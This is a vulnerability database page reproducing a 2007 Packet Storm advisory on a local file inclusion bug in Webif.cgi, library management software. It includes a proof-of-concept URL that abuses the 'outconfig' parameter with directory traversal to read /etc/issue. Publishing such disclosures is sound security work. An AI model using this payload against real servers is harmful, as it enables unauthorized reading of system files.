Lucene search

K

webif-lfi.txt

🗓️ 20 Jun 2007 00:00:00Reported by maiosyetType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

WEBIF.CGI LFI Exploi

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`.:: WEBIF.CGI LOCALE FILE INCLUSION ::.  
  
[#] AUTHOR: maiosyet  
[#] CONTACT: [email protected]  
[#] SITE: http://www.mawk.org  
  
[#] ORIGINAL ADV:  
http://www.mawk.org/mods.php?mods=Core&page=view&id=102  
  
[#] SOFTWARE: Webif.cgi  
http://www.ifnet.it/webif/  
  
[#] DESCRIPTION:  
Webif is the natural solution for librarianships who want visibility across   
the web or would like to manage Intranet networks, the whole at a reasonable price.  
  
[#] BUG:  
Input passed to the "outconfig" parameter in webif.cgi is not properly verified.  
This can be exploited to include arbitrary files from local resources.  
  
[#] PoC:  
http://www.site.org/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue  
  
[#] Thanks:   
Einyx; Anathema, Hidden, XVII, Shatsar, Kaisentlaia and all the mawkers; black_dhalya :*  
Federico, Eveline (you know who you are).   
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4
21
.json
Report